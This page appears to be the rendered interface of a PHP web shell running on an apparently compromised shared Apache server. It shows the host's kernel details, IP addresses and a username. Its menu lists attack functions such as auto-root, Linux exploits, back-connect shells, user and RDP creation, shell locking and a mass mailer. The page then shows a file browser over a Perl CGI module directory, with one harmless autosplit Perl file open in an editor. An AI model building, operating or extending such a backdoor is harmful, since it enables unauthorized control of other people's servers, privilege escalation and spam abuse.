Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
auto /
CGI /
XMLForm /
Path /
[ HOME SHELL ]
Name
Size
Permission
Action
Append.al
633
B
-rw-r--r--
Attrib.al
344
B
-rw-r--r--
FullPath.al
470
B
-rw-r--r--
Path.al
336
B
-rw-r--r--
Pop.al
425
B
-rw-r--r--
autosplit.ix
308
B
-rw-r--r--
buildSelf.al
1.19
KB
-rw-r--r--
isChildPath.al
664
B
-rw-r--r--
isEqual.al
718
B
-rw-r--r--
isRelative.al
357
B
-rw-r--r--
isRepeat.al
349
B
-rw-r--r--
new.al
612
B
-rw-r--r--
rebuildSelf.al
400
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Append.al
# NOTE: Derived from ../blib/lib/CGI/XMLForm/Path.pm. # Changes made here will be lost when autosplit is run again. # See AutoSplit.pm. package CGI::XMLForm::Path; #line 148 "../blib/lib/CGI/XMLForm/Path.pm (autosplit into ../blib/lib/auto/CGI/XMLForm/Path/Append.al)" sub Append { my $self = shift; my $element = shift; my %attribs = @_; if (%attribs) { $element .= "["; $element .= join " and ", (map "\@$_=\"$attribs{$_}\"", (keys %attribs)); $element .= "]"; } push @{$self->{_fullpath}}, $element; push @{$self->{Parts}}, $element; $self->{_path} .= "/". $element; } # end of CGI::XMLForm::Path::Append 1;
Close